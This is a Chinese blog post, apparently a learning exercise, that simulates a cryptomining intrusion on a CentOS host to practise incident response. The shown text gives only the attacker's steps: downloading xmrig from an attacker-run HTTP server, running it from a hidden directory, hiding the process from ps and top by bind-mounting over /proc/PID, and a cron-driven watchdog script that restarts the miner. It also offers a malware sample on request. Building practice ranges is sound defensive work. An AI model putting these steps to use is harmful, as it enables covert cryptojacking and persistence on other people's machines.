该文介绍了如何模拟一个挖矿病毒攻击,包括利用漏洞获取shell,上传并运行挖矿程序,通过改变目录挂载和设置计划任务来隐藏进程,以避免被系统管理员检测到。同时,提供了创建隐藏目录、编写监控脚本和使用Cron计划任务以实现病毒进程的自动重启的方法。
挖矿病毒应急响应
自己在应急响应这方面的知识,可以说是很薄弱,几乎为0。最近打算入手学习一下应急响应,看了好久的文档,想着实战一下检验自己的学习成果,不过是本人的资源有限,也没找到啥好的靶场,所以就想着自己搭建一个。但是由于本人实力有限,也只懂得皮毛。大家不要嘲笑,也多请各位大佬多多指教!!
一、攻击模拟
1、环境
现在我们模拟一下攻击者,假设现在我们已经通过漏洞getshell或者rec了
受害主机:centos7
2、攻击流程
先查看一下权限,root权限
然后就是把病毒传上来
挖矿病毒的运行程序我放在的根目录下,在攻击机启动一个web服务
python3 -m http.server 9999
然后我们在受害主机上用wget命令下载
创建一个隐藏目录,并然后解压到新目录
tar -zxvf xxx
cd到我们挖矿程序的目录,然后给他权限,运行
chmod +x xmrig
此时我们可以看到cpu爆满,这样就是运行成功了。
此时我们在ps里是可以看到他的信息
ps -aux | grep pid号
这样的话防守人员或者说运维人员,很容易发现他,当他们看到cpu爆红之后开始排查,就很容易排查到我们,我们需要给他隐藏起来
3、目录挂载
无法通过ps、top等命令进行查询,可能是因为攻击者将/proc/pid进行了隐藏,可以通过一下方式进行(ubuntu测试成功,centos测试失败)
- makdir .hidder
- sudo mount -o bind .hidder /proc/3514
这种情况可以使用cat /proc/$$/mountinfo
这样整一个目录挂在,就无法通过 ps、top等命令进行查询
4、计划任务
添加计划任务,作用就是如果他的进程被杀掉了,可以再次启动
第一步就是先创建一个shell脚本,写如一下内容
#!/bin/bash
if ! pgrep -x "xmrig"
then
nohup /tmp/.k/xmrig &
fi
赋予他执行的权限
sudo chmod +x /tmp/.k/xmrig.sh
设置计划任务,定期执行监控脚本。你可以使用Cron来设置计划任务,让监控脚本每隔一段时间执行一次。
执行以下命令以编辑Cron表:
crontab -e
在打开的文件中,添加以下行来设置计划任务:
* * * * * sleep 10; /tmp/.k/xmrig.sh #每10s执行一次
crontab -e
在打开的文件中,添加以下行来设置计划任务:
* * * * * sleep 10; /tmp/.k/xmrig.sh #每10s执行一次
病毒样本获取
橙色少年 ,后台发送 " 挖矿病毒样本 " 即可!
817
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
